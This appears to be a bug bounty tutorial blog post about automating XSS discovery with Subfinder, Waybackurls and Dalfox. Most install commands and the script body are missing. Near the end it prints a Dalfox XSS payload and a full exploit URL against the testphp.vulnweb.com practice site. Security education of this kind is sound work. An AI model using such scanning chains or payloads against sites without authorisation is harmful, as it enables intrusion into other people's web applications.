Automate XSS With These 3 Simple Tools

Hi, Ajak Amico’s welcome back to another blog today. Many security researchers love to automate their bug bounty process, in that case, I will show how to automate XSS with 3 simple tools . Before starting, if you haven’t subscribed to our channel, do subscribe, guys. Contents related to cyber security, Bug Bounty, and Digital Forensics Investigation.👇

Follow our Youtube Channel: @ajakcybersecurity (361Videos)

Follow on Instagram: @ajakcybersecurity👇

To Automate this process you just need these 3 Tools. The Installation process is given below.

Subfinder:

Subfinder is a command-line tool for subdomain discovering, and this helps in the enumeration of the list of the existing domains related to a target. Normally, by using this tool one would specify a target domain and then start a scan that will detect the subdomains

Waybackurls:

Waybackurls is a command-line tool that extracts URLs from the Wayback Machine’s archived snapshots of websites. It allows users to retrieve historical URLs associated with a target domain, aiding in reconnaissance, analysis, and potentially discovering forgotten or hidden content.

Dalfox:

Dalfox is a fast and powerful XSS scanner and parameter analysis tool designed for web application security testing. Users input a target URL and Dalfox scans for potential XSS vulnerabilities, providing detailed reports to aid in identifying and mitigating security risks.

Install Go:

Install Subfinder:

Install Waybackurls:

Install Dalfox:

Errors while Installing Tools

I can understand your feeling after hearing the word error don’t worry I’ll help you to clear the error.

after giving the command to install the Wayback URLs

After Entering the above command you don’t see anything it shows just refreshed.

you have to set a path for that tool so you need to give the command

before giving the above command you need to change the directory to go for that give

it may change according to your system locating your go directory.

Then install Dalfox and do the same step that we have done for the Wayback URL.

You can do this in 2 methods, either like a one-liner tool or make the code executable and make it a tool.

Method:1

Just copy and paste the commands one by one

Method2:

Open terminal and type:

nano automateXSS.sh

it opens the editor in that type the code which I have given below

then save the code by pressing ctrl+O.

we need to make the code executable for that we have to give the below command.

chmod +x automateXSS.sh

now all ready let’s start to automate those tools now we gonna execute the tool.

./automateXSS.sh

Boom!!!

The tool get started now it asks the target

we have to give the target without the https/http for learning purposes I use the test website.

testphp.vulnweb.com

starts scanning and waits for the result. Finally, we got the result!!!!

We have found DOM Object XSS. Payload is also designed by the tool itself.

<img/src/onerror=.1|alert`` class=dalfox>

Now, we will copy the full address link at which XSS is triggered.

http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E

Boom!!!!!!!!!!!! its worked

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Hope you would have learned some information from this blog if so, kindly press that follow button for further updates. Best wishes from Ajak Cybersecurity.❤️

“கற்றவை பற்றவை🔥”

Learn Everyday, Happy Hacking 😁🙌

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Follow our Youtube Channel: @ajakcybersecurity

Follow on Instagram: @ajakcybersecurity